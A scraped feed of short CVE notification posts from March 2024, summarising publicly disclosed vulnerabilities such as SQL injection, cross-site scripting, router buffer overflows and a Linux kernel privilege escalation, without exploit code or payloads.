🚨 CVE-2023-45919Mesa 23.0.4 was discovered to contain a buffer over-read in glXQueryServerString(). NOTE: this is disputed because there are no common situations in which users require uninterrupted operation with an attacker-controller server.🎖@cveNotify |
|
| 2024-03-27 04:37:46 |
🚨 CVE-2023-45929S-Lang 2.3.2 was discovered to contain a segmentation fault via the function fixup_tgetstr().🎖@cveNotify |
|
| 2024-03-27 04:37:41 |
🚨 CVE-2023-45913Mesa v23.0.4 was discovered to contain a NULL pointer dereference via the function dri2GetGlxDrawableFromXDrawableId(). This vulnerability is triggered when the X11 server sends an DRI2_BufferSwapComplete event unexpectedly when the application is using DRI3. NOTE: this is disputed because there is no scenario in which the vulnerability was demonstrated.🎖@cveNotify |
|
| 2024-03-27 04:37:40 |
🚨 CVE-2023-40288An issue was discovered on Supermicro X11SSM-F, X11SAE-F, and X11SSE-F 1.66 devices. An attacker could exploit an XSS issue.🎖@cveNotify |
|
| 2024-03-27 04:37:35 |
🚨 CVE-2023-40286An issue was discovered on Supermicro X11SSM-F, X11SAE-F, and X11SSE-F 1.66 devices. An attacker could exploit an XSS issue.🎖@cveNotify |
|
| 2024-03-27 04:37:34 |
🚨 CVE-2023-39804In GNU tar before 1.35, mishandled extension attributes in a PAX archive can lead to an application crash in xheader.c.🎖@cveNotify |
|
| 2024-03-27 03:37:32 |
🚨 CVE-2024-22025A vulnerability in Node.js has been identified, allowing for a Denial of Service (DoS) attack through resource exhaustion when using the fetch() function to retrieve content from an untrusted URL.The vulnerability stems from the fact that the fetch() function in Node.js always decodes Brotli, making it possible for an attacker to cause resource exhaustion when fetching content from an untrusted URL.An attacker controlling the URL passed into fetch() can exploit this vulnerability to exhaust memory, potentially leading to process termination, depending on the system configuration.🎖@cveNotify |
|
| 2024-03-27 03:37:26 |
🚨 CVE-2023-4255An out-of-bounds write issue has been discovered in the backspace handling of the checkType() function in etc.c within the W3M application. This vulnerability is triggered by supplying a specially crafted HTML file to the w3m binary. Exploitation of this flaw could lead to application crashes, resulting in a denial of service condition.🎖@cveNotify |
|
| 2024-03-27 03:37:25 |
🚨 CVE-2023-38252An out-of-bounds read flaw was found in w3m, in the Strnew_size function in Str.c. This issue may allow an attacker to cause a denial of service through a crafted HTML file.🎖@cveNotify |
|
| 2024-03-27 03:37:24 |
🚨 CVE-2022-38223There is an out-of-bounds write in checkType located in etc.c in w3m 0.5.3. It can be triggered by sending a crafted HTML file to the w3m binary. It allows an attacker to cause Denial of Service or possibly have unspecified other impact.🎖@cveNotify |
|
| 2024-03-27 02:37:34 |
🚨 CVE-2024-2940A vulnerability classified as problematic was found in Campcodes Online Examination System 1.0. Affected by this vulnerability is an unknown functionality of the file /adminpanel/admin/facebox_modal/updateCourse.php. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258031.🎖@cveNotify |
|
| 2024-03-27 02:37:33 |
🚨 CVE-2024-1531A vulnerability exists in the stb-language file handling that affects the RTU500 series product versions listed below. A malicious actor could print random memory content in the RTU500 system log, if an authorized user uploads a specially crafted stb-language file.🎖@cveNotify |
|
| 2024-03-27 01:37:32 |
🚨 CVE-2024-2939A vulnerability classified as problematic has been found in Campcodes Online Examination System 1.0. Affected is an unknown function of the file /adminpanel/admin/facebox_modal/updateExaminee.php. The manipulation of the argument id leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-258030 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-27 01:37:31 |
🚨 CVE-2024-2938A vulnerability was found in Campcodes Online Examination System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /adminpanel/admin/facebox_modal/updateCourse.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258029 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-27 01:37:27 |
🚨 CVE-2024-2934A vulnerability classified as critical was found in SourceCodester Todo List in Kanban Board 1.0. Affected by this vulnerability is an unknown functionality of the file /endpoint/delete-todo.php. The manipulation of the argument list leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258013 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-27 01:37:26 |
🚨 CVE-2024-1753A flaw was found in Buildah (and subsequently Podman Build) which allows containers to mount arbitrary locations on the host filesystem into build containers. A malicious Containerfile can use a dummy image with a symbolic link to the root filesystem as a mount source and cause the mount operation to mount the host root filesystem inside the RUN step. The commands inside the RUN step will then have read-write access to the host filesystem, allowing for full container escape at build time.🎖@cveNotify |
|
| 2024-03-27 01:07:25 |
🚨 CVE-2023-24955Microsoft SharePoint Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-27 00:37:28 |
🚨 CVE-2024-2930A vulnerability was found in SourceCodester Music Gallery Site 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file classes/Master.php?f=save_music. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258001 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-27 00:37:27 |
🚨 CVE-2017-20190Some Microsoft technologies as used in Windows 8 through 11 allow a temporary client-side performance degradation during processing of multiple Unicode combining characters, aka a "Zalgo text" attack. NOTE: third parties dispute whether the computational cost of interpreting Unicode data should be considered a vulnerability.🎖@cveNotify |
|
| 2024-03-26 23:37:32 |
🚨 CVE-2024-2916A vulnerability was found in Campcodes House Rental Management System 1.0. It has been classified as critical. Affected is an unknown function of the file ajax.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257982 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-26 23:37:26 |
🚨 CVE-2024-26577VSeeFace through 1.13.38.c2 allows attackers to cause a denial of service (application hang) via a spoofed UDP packet containing at least 10 digits in JSON data.🎖@cveNotify |
|
| 2024-03-26 23:37:25 |
🚨 CVE-2024-25136There is a function in AutomationDirect C-MORE EA9 HMI that allows an attacker to send a relative path in the URL without proper sanitizing of the content.🎖@cveNotify |
|
| 2024-03-26 23:37:24 |
🚨 CVE-2023-50702Sikka SSCWindowsService 5 2023-09-14 executes a program as LocalSystem but allows full control by low-privileged users (and low-privileged users have write access to %PROGRAMDATA%\SSCService). Consequently, low-privileged users can execute arbitrary code as LocalSystem.🎖@cveNotify |
|
| 2024-03-26 22:37:25 |
🚨 CVE-2023-51147Buffer Overflow vulnerability in TRENDnet Trendnet AC1200 TEW-821DAP with firmware version 3.00b06 allows an attacker to execute arbitrary code via the adm_mod_pwd action.🎖@cveNotify |
|
| 2024-03-26 22:37:24 |
🚨 CVE-2023-51146Buffer Overflow vulnerability in TRENDnet AC1200 TEW-821DAP with firmware version 3.00b06 allows an attacker to execute arbitrary code via the adm_add_user action.🎖@cveNotify |
|
| 2024-03-26 20:37:32 |
🚨 CVE-2023-27630Exposure of Sensitive Information to an Unauthorized Actor vulnerability in PeepSo Community by PeepSo.This issue affects Community by PeepSo: from n/a through 6.0.9.0.🎖@cveNotify |
|
| 2024-03-26 20:37:25 |
🚨 CVE-2023-23656Unrestricted Upload of File with Dangerous Type vulnerability in MainWP MainWP File Uploader Extension.This issue affects MainWP File Uploader Extension: from n/a through 4.1.🎖@cveNotify |
|
| 2024-03-26 20:37:24 |
🚨 CVE-2024-2485A vulnerability was found in Tenda AC18 15.03.05.05 and classified as critical. Affected by this issue is the function formSetSpeedWan of the file /goform/SetSpeedWan. The manipulation of the argument speed_dir leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256892. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-26 18:37:25 |
🚨 CVE-2023-44989Insertion of Sensitive Information into Log File vulnerability in GSheetConnector CF7 Google Sheets Connector.This issue affects CF7 Google Sheets Connector: from n/a through 5.0.5.🎖@cveNotify |
|
| 2024-03-26 18:37:24 |
🚨 CVE-2024-1086A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.We recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.🎖@cveNotify |
|
| 2024-03-26 17:37:33 |
🚨 CVE-2024-2906Missing Authorization vulnerability in SoftLab Radio Player.This issue affects Radio Player: from n/a through 2.0.73.🎖@cveNotify |
|
| 2024-03-26 17:37:27 |
🚨 CVE-2024-22156Missing Authorization vulnerability in SNP Digital SalesKing.This issue affects SalesKing: from n/a through 1.6.15.🎖@cveNotify |
|
| 2024-03-26 17:37:26 |
🚨 CVE-2024-2553A vulnerability, which was classified as problematic, was found in SourceCodester Product Review Rating System 1.0. Affected is an unknown function of the component Rate Product Handler. The manipulation of the argument Your Name/Comment leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257052.🎖@cveNotify |
|
| 2024-03-26 17:37:25 |
🚨 CVE-2024-1086A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.We recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.🎖@cveNotify |
|
| 2024-03-26 16:38:28 |
🚨 CVE-2024-25958Dell Grab for Windows, versions up to and including 5.0.4, contain Weak Application Folder Permissions vulnerability. A local authenticated attacker could potentially exploit this vulnerability, leading to privilege escalation, unauthorized access to application data, unauthorized modification of application data and service disruption.🎖@cveNotify |
|
| 2024-03-26 16:38:27 |
🚨 CVE-2024-21919An uninitialized pointer in Rockwell Automation Arena Simulation software could potentially allow a malicious user to insert unauthorized code to the software by leveraging the pointer after it is properly. Once inside, the threat actor can run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To trigger this, the user would unwittingly need to open a malicious file shared by the threat actor.🎖@cveNotify |
|
| 2024-03-26 16:38:22 |
🚨 CVE-2024-21913A heap-based memory buffer overflow vulnerability in Rockwell Automation Arena Simulation software could potentially allow a malicious user to insert unauthorized code into the software by overstepping the memory boundaries, which triggers an access violation. Once inside, the threat actor can run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To trigger this, the user would unwittingly need to open a malicious file shared by the threat actor.🎖@cveNotify |
|
| 2024-03-26 16:38:21 |
🚨 CVE-2023-7216A path traversal vulnerability was found in the CPIO utility. This issue could allow a remote unauthenticated attacker to trick a user into opening a specially crafted archive. During the extraction process, the archiver could follow symlinks outside of the intended directory, this allows writing files in arbitrary directories through symlinks.🎖@cveNotify |
|
| 2024-03-26 16:38:17 |
🚨 CVE-2023-40548A buffer overflow was found in Shim in the 32-bit system. The overflow happens due to an addition operation involving a user-controlled value parsed from the PE binary being used by Shim. This value is further used for memory allocation operations, leading to a heap-based buffer overflow. This flaw causes memory corruption and can lead to a crash or data integrity issues during the boot phase.🎖@cveNotify |
|
| 2024-03-26 16:38:16 |
🚨 CVE-2023-4194A flaw was found in the Linux kernel's TUN/TAP functionality. This issue could allow a local user to bypass network filters and gain unauthorized access to some resources. The original patches fixing CVE-2023-1076 are incorrect or incomplete. The problem is that the following upstream commits - a096ccca6e50 ("tun: tun_chr_open(): correctly initialize socket uid"), - 66b2c338adce ("tap: tap_open(): correctly initialize socket uid"), pass "inode->i_uid" to sock_init_data_uid() as the last parameter and that turns out to not be accurate.🎖@cveNotify |
|
| 2024-03-26 14:37:55 |
🚨 CVE-2024-29883CreateWiki is Miraheze's MediaWiki extension for requesting & creating wikis. Suppression of wiki requests does not work as intended, and always restricts visibility to those with the `(createwiki)` user right regardless of the settings one sets on a given wiki request. This may expose information to users who are not supposed to be able to access it.🎖@cveNotify |
|
| 2024-03-26 14:37:54 |
🚨 CVE-2024-29881TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE’s content loading and content inserting code. A SVG image could be loaded though an `object` or `embed` element and that image could potentially contain a XSS payload. This vulnerability is fixed in 6.8.1 and 7.0.0.🎖@cveNotify |
|
| 2024-03-26 14:37:51 |
🚨 CVE-2024-29684DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /src/dede/makehtml_homepage.php allowing a remote attacker to execute arbitrary code.🎖@cveNotify |
|
| 2024-03-26 14:37:50 |
🚨 CVE-2024-1455The XMLOutputParser in LangChain uses the etree module from the XML parser in the standard python library which has some XML vulnerabilities; see: https://docs.python.org/3/library/xml.htmlThis primarily affects users that combine an LLM (or agent) with the `XMLOutputParser` and expose the component via an endpoint on a web-service. This would allow a malicious party to attempt to manipulate the LLM to produce a malicious payload for the parser that would compromise the availability of the service.A successful attack is predicated on:1. Usage of XMLOutputParser2. Passing of malicious input into the XMLOutputParser either directly or by trying to manipulate an LLM to do so on the users behalf3. Exposing the component via a web-service🎖@cveNotify |
|
| 2024-03-26 14:37:49 |
🚨 CVE-2023-33855Under certain conditions, RSA operations performed by IBM Common Cryptographic Architecture (CCA) 7.0.0 through 7.5.36 may exhibit non-constant-time behavior. This could allow a remote attacker to obtain sensitive information using a timing-based attack. IBM X-Force ID: 257676.🎖@cveNotify |
|
| 2024-03-26 13:08:36 |
🚨 CVE-2024-29440An unauthorized access vulnerability has been discovered in ROS2 Humble Hawksbill versions where ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3. This vulnerability could potentially allow a malicious user to gain unauthorized access to multiple ROS2 nodes remotely. Unauthorized access to these nodes could result in compromised system integrity, the execution of arbitrary commands, and disclosure of sensitive information.🎖@cveNotify |
|
| 2024-03-26 13:08:35 |
🚨 CVE-2024-29179phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. An attacker with admin privileges can upload an attachment containing JS code without extension and the application will render it as HTML which allows for XSS attacks.🎖@cveNotify |
|
| 2024-03-26 13:08:34 |
🚨 CVE-2024-29025Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `HttpPostRequestDecoder` can be tricked to accumulate data. While the decoder can store items on the disk if configured so, there are no limits to the number of fields the form can have, an attacher can send a chunked post consisting of many small fields that will be accumulated in the `bodyListHttpData` list. The decoder cumulates bytes in the `undecodedChunk` buffer until it can decode a field, this field can cumulate data without limits. This vulnerability is fixed in 4.1.108.Final.🎖@cveNotify |
|
| 2024-03-26 13:08:30 |
🚨 CVE-2024-28245KaTeX is a JavaScript library for TeX math rendering on the web. KaTeX users who render untrusted mathematical expressions could encounter malicious input using `\includegraphics` that runs arbitrary JavaScript, or generate invalid HTML. Upgrade to KaTeX v0.16.10 to remove this vulnerability.🎖@cveNotify |
|
| 2024-03-26 13:08:29 |
🚨 CVE-2024-29666Insecure Permissions vulnerability in Vehicle Monitoring platform system CMSV6 v.7.31.0.2 through v.7.32.0.3 allows a remote attacker to escalate privileges via the default password component.🎖@cveNotify |
|
| 2024-03-26 13:08:25 |
🚨 CVE-2024-28850WP Crontrol controls the cron events on WordPress websites. WP Crontrol includes a feature that allows administrative users to create events in the WP-Cron system that store and execute PHP code subject to the restrictive security permissions documented here. While there is no known vulnerability in this feature on its own, there exists potential for this feature to be vulnerable to RCE if it were specifically targeted via vulnerability chaining that exploited a separate SQLi (or similar) vulnerability. This is exploitable on a site if one of the below preconditions are met, the site is vulnerable to a writeable SQLi vulnerability in any plugin, theme, or WordPress core, the site's database is compromised at the hosting level, the site is vulnerable to a method of updating arbitrary options in the wp_options table, or the site is vulnerable to a method of triggering an arbitrary action, filter, or function with control of the parameters. As a hardening measure, WP Crontrol version 1.16.2 ships with a new feature that prevents tampering of the code stored in a PHP cron event.🎖@cveNotify |
|
| 2024-03-26 13:08:24 |
🚨 CVE-2024-28107phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. A SQL injection vulnerability has been discovered in the `insertentry` & `saveentry` when modifying records due to improper escaping of the email address. This allows any authenticated user with the rights to add/edit FAQ news to exploit this vulnerability to exfiltrate data, take over accounts and in some cases, even achieve RCE. This vulnerability is fixed in 3.2.6.🎖@cveNotify |
|
| 2024-03-26 13:08:23 |
🚨 CVE-2024-28106phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. By manipulating the news parameter in a POST request, an attacker can inject malicious JavaScript code. Upon browsing to the compromised news page, the XSS payload triggers. This vulnerability is fixed in 3.2.6.🎖@cveNotify |
|
| 2024-03-26 13:08:20 |
🚨 CVE-2024-28105phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. The category image upload function in phpmyfaq is vulnerable to manipulation of the `Content-type` and `lang` parameters, allowing attackers to upload malicious files with a .php extension, potentially leading to remote code execution (RCE) on the system. This vulnerability is fixed in 3.2.6.🎖@cveNotify |
|
| 2024-03-26 13:08:19 |
🚨 CVE-2023-48296OroPlatform is a PHP Business Application Platform (BAP). Navigation history, most viewed and favorite navigation items are returned to storefront user in JSON navigation response if ID of storefront user matches ID of back-office user. This vulnerability is fixed in 5.1.4.🎖@cveNotify |
|
| 2024-03-26 13:08:18 |
🚨 CVE-2023-45824OroPlatform is a PHP Business Application Platform (BAP). A logged in user can access page state data of pinned pages of other users by pageId hash. This vulnerability is fixed in 5.1.4.🎖@cveNotify |
|
| 2024-03-26 10:38:15 |
🚨 CVE-2024-28131EasyRange Ver 1.41 contains an issue with the executable file search path when displaying an extracted file on Explorer, which may lead to loading an executable file resides in the same folder where the extracted file is placed. If this vulnerability is exploited, arbitrary code may be executed with the privilege of the running program. Note that the developer was unreachable, therefore, users should consider stop using EasyRange Ver 1.41.🎖@cveNotify |
|
| 2024-03-26 10:38:08 |
🚨 CVE-2024-28033OS command injection vulnerability exists in WebProxy 1.7.8 and 1.7.9, which may allow a remote unauthenticated attacker to execute an arbitrary OS command with the privilege of the running web server. Note that the developer was unreachable, therefore, users should consider stop using WebProxy 1.7.8 and 1.7.9.🎖@cveNotify |
|
| 2024-03-26 10:38:07 |
🚨 CVE-2024-26018Cross-site scripting vulnerability exists in TvRock 0.9t8a. An arbitrary script may be executed on the web browser of the user accessing the website that uses the product. Note that the developer was unreachable, therefore, users should consider stop using TvRock 0.9t8a.🎖@cveNotify |
|
| 2024-03-26 08:37:47 |
🚨 CVE-2023-6175NetScreen file parser crash in Wireshark 4.0.0 to 4.0.10 and 3.6.0 to 3.6.18 allows denial of service via crafted capture file🎖@cveNotify |
|
| 2024-03-26 08:37:46 |
🚨 CVE-2023-49839Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in KlbTheme Cosmetsy theme (core plugin), KlbTheme Partdo theme (core plugin), KlbTheme Bacola theme (core plugin), KlbTheme Medibazar theme (core plugin), KlbTheme Furnob theme (core plugin), KlbTheme Clotya theme (core plugin) allows Reflected XSS.This issue affects Cosmetsy theme (core plugin): from n/a through 1.3.0; Partdo theme (core plugin): from n/a through 1.0.9; Bacola theme (core plugin): from n/a through 1.3.3; Medibazar theme (core plugin): from n/a through 1.2.3; Furnob theme (core plugin): from n/a through 1.1.7; Clotya theme (core plugin): from n/a through 1.1.5.🎖@cveNotify |
|
| 2024-03-26 07:37:29 |
🚨 CVE-2024-2889Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Lab WP-Lister Lite for Amazon allows Stored XSS.This issue affects WP-Lister Lite for Amazon: from n/a through 2.6.11.🎖@cveNotify |
|
| 2024-03-26 06:38:02 |
🚨 CVE-2024-2303The Easy Textillate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'textillate' shortcode in all versions up to, and including, 2.01 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-26 05:37:36 |
🚨 CVE-2024-2170The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the child page index widget in all versions up to, and including, 9.96.0.1 due to insufficient input sanitization and output escaping on user supplied attributes such as 'className.' This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-26 05:37:35 |
🚨 CVE-2023-7232The Backup and Restore WordPress WordPress plugin through 1.45 does not protect some log files containing sensitive information such as site configuration etc, allowing unauthenticated users to access such data🎖@cveNotify |
|
| 2024-03-26 03:38:11 |
🚨 CVE-2024-2811A vulnerability was found in Tenda AC15 15.03.20_multi and classified as critical. Affected by this issue is the function formWifiWpsStart of the file /goform/WifiWpsStart. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257666 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-26 03:38:05 |
🚨 CVE-2024-2810A vulnerability has been found in Tenda AC15 15.03.05.18/15.03.20_multi and classified as critical. Affected by this vulnerability is the function formWifiWpsOOB of the file /goform/WifiWpsOOB. The manipulation of the argument index leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257665 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-26 03:38:04 |
🚨 CVE-2024-2807A vulnerability classified as critical was found in Tenda AC15 15.03.05.18/15.03.20_multi. This vulnerability affects the function formExpandDlnaFile of the file /goform/expandDlnaFile. The manipulation of the argument filePath leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257662 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-26 03:38:03 |
🚨 CVE-2024-2806A vulnerability classified as critical has been found in Tenda AC15 15.03.05.18/15.03.20_multi. This affects the function addWifiMacFilter of the file /goform/addWifiMacFilter. The manipulation of the argument deviceId/deviceMac leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257661 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-26 02:37:40 |
🚨 CVE-2024-2732The Themify Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'themify_post_slider shortcode in all versions up to, and including, 2.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-26 01:37:55 |
🚨 CVE-2024-23280An injection issue was addressed with improved validation. This issue is fixed in Safari 17.4, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4, tvOS 17.4. A maliciously crafted webpage may be able to fingerprint the user.🎖@cveNotify |
|
| 2024-03-26 01:37:54 |
🚨 CVE-2024-23263A logic issue was addressed with improved validation. This issue is fixed in tvOS 17.4, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, Safari 17.4. Processing maliciously crafted web content may prevent Content Security Policy from being enforced.🎖@cveNotify |
|
| 2024-03-26 01:07:29 |
🚨 CVE-2019-7256Linear eMerge E3-Series devices allow Command Injections.🎖@cveNotify |
|
| 2024-03-26 00:37:25 |
🚨 CVE-2024-29301SourceCodester PHP Task Management System 1.0 is vulnerable to SQL Injection via update-admin.php?admin_id=🎖@cveNotify |
|
| 2024-03-26 00:37:24 |
🚨 CVE-2024-1580An integer overflow in dav1d AV1 decoder that can occur when decoding videos with large frame size. This can lead to memory corruption within the AV1 decoder. We recommend upgrading past version 1.4.0 of dav1d.🎖@cveNotify |
|
| 2024-03-25 23:37:29 |
🚨 CVE-2024-0901Remotely executed SEGV and out of bounds read allows malicious packet sender to crash or cause an out of bounds read via sending a malformed packet with the correct length.🎖@cveNotify |
|
| 2024-03-25 22:38:29 |
🚨 CVE-2024-2873A vulnerability was found in wolfSSH's server-side state machine before versions 1.4.17. A malicious client could create channels without first performing user authentication, resulting in unauthorized access.🎖@cveNotify |
|
| 2024-03-25 22:38:25 |
🚨 CVE-2024-1973By leveraging the vulnerability, lower-privileged users of Content Manager can manipulate Content Manager clients to elevate privileges and perform unauthorized operations.🎖@cveNotify |
|
| 2024-03-25 22:38:24 |
🚨 CVE-2024-0690An information disclosure flaw was found in ansible-core due to a failure to respect the ANSIBLE_NO_LOG configuration in some scenarios. Information is still included in the output in certain tasks, such as loop items. Depending on the task, this issue may include sensitive information, such as decrypted secret values.🎖@cveNotify |
|
| 2024-03-25 21:37:32 |
🚨 CVE-2024-2427A denial-of-service vulnerability exists in the Rockwell Automation PowerFlex® 527 due to improper traffic throttling in the device. If multiple data packets are sent to the device repeatedly the device will crash and require a manual restart to recover.🎖@cveNotify |
|
| 2024-03-25 21:37:25 |
🚨 CVE-2024-29179phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. An attacker with admin privileges can upload an attachment containing JS code without extension and the application will render it as HTML which allows for XSS attacks.🎖@cveNotify |
|
| 2024-03-25 21:37:24 |
🚨 CVE-2024-29041Express.js minimalist web framework for node. Versions of Express.js prior to 4.19.0 and all pre-release alpha and beta versions of 5.0 are affected by an open redirect vulnerability using malformed URLs. When a user of Express performs a redirect using a user-provided URL Express performs an encode [using `encodeurl`](https://github.com/pillarjs/encodeurl) on the contents before passing it to the `location` header. This can cause malformed URLs to be evaluated in unexpected ways by common redirect allow list implementations in Express applications, leading to an Open Redirect via bypass of a properly implemented allow list. The main method impacted is `res.location()` but this is also called from within `res.redirect()`. The vulnerability is fixed in 4.19.2 and 5.0.0-beta.3.🎖@cveNotify |
|
| 2024-03-25 20:37:25 |
🚨 CVE-2024-28245KaTeX is a JavaScript library for TeX math rendering on the web. KaTeX users who render untrusted mathematical expressions could encounter malicious input using `\includegraphics` that runs arbitrary JavaScript, or generate invalid HTML. Upgrade to KaTeX v0.16.10 to remove this vulnerability.🎖@cveNotify |
|
| 2024-03-25 20:37:24 |
🚨 CVE-2024-28243KaTeX is a JavaScript library for TeX math rendering on the web. KaTeX users who render untrusted mathematical expressions could encounter malicious input using `\edef` that causes a near-infinite loop, despite setting `maxExpand` to avoid such loops. This can be used as an availability attack, where e.g. a client rendering another user's KaTeX input will be unable to use the site due to memory overflow, tying up the main thread, or stack overflow. Upgrade to KaTeX v0.16.10 to remove this vulnerability.🎖@cveNotify |
|
| 2024-03-25 19:37:36 |
🚨 CVE-2024-29666Insecure Permissions vulnerability in Vehicle Monitoring platform system CMSV6 v.7.31.0.2 through v.7.32.0.3 allows a remote attacker to escalate privileges via the default password component.🎖@cveNotify |
|
| 2024-03-25 19:37:32 |
🚨 CVE-2024-28850WP Crontrol controls the cron events on WordPress websites. WP Crontrol includes a feature that allows administrative users to create events in the WP-Cron system that store and execute PHP code subject to the restrictive security permissions documented here. While there is no known vulnerability in this feature on its own, there exists potential for this feature to be vulnerable to RCE if it were specifically targeted via vulnerability chaining that exploited a separate SQLi (or similar) vulnerability. This is exploitable on a site if one of the below preconditions are met, the site is vulnerable to a writeable SQLi vulnerability in any plugin, theme, or WordPress core, the site's database is compromised at the hosting level, the site is vulnerable to a method of updating arbitrary options in the wp_options table, or the site is vulnerable to a method of triggering an arbitrary action, filter, or function with control of the parameters. As a hardening measure, WP Crontrol version 1.16.2 ships with a new feature that prevents tampering of the code stored in a PHP cron event.🎖@cveNotify |
|
| 2024-03-25 19:37:31 |
🚨 CVE-2024-28107phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. A SQL injection vulnerability has been discovered in the `insertentry` & `saveentry` when modifying records due to improper escaping of the email address. This allows any authenticated user with the rights to add/edit FAQ news to exploit this vulnerability to exfiltrate data, take over accounts and in some cases, even achieve RCE. This vulnerability is fixed in 3.2.6.🎖@cveNotify |
|
| 2024-03-25 19:37:30 |
🚨 CVE-2024-28106phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. By manipulating the news parameter in a POST request, an attacker can inject malicious JavaScript code. Upon browsing to the compromised news page, the XSS payload triggers. This vulnerability is fixed in 3.2.6.🎖@cveNotify |
|
| 2024-03-25 19:37:26 |
🚨 CVE-2024-27300phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. The `email` field in phpMyFAQ's user control panel page is vulnerable to stored XSS attacks due to the inadequacy of PHP's `FILTER_VALIDATE_EMAIL` function, which only validates the email format, not its content. This vulnerability enables an attacker to execute arbitrary client-side JavaScript within the context of another user's phpMyFAQ session. This vulnerability is fixed in 3.2.6.🎖@cveNotify |
|
| 2024-03-25 19:37:25 |
🚨 CVE-2023-48296OroPlatform is a PHP Business Application Platform (BAP). Navigation history, most viewed and favorite navigation items are returned to storefront user in JSON navigation response if ID of storefront user matches ID of back-office user. This vulnerability is fixed in 5.1.4.🎖@cveNotify |
|
| 2024-03-25 19:37:24 |
🚨 CVE-2023-45824OroPlatform is a PHP Business Application Platform (BAP). A logged in user can access page state data of pinned pages of other users by pageId hash. This vulnerability is fixed in 5.1.4.🎖@cveNotify |
|
| 2024-03-25 18:37:36 |
🚨 CVE-2024-1580An integer overflow in dav1d AV1 decoder that can occur when decoding videos with large frame size. This can lead to memory corruption within the AV1 decoder. We recommend upgrading past version 1.4.0 of dav1d.🎖@cveNotify |
|
| 2024-03-25 18:37:35 |
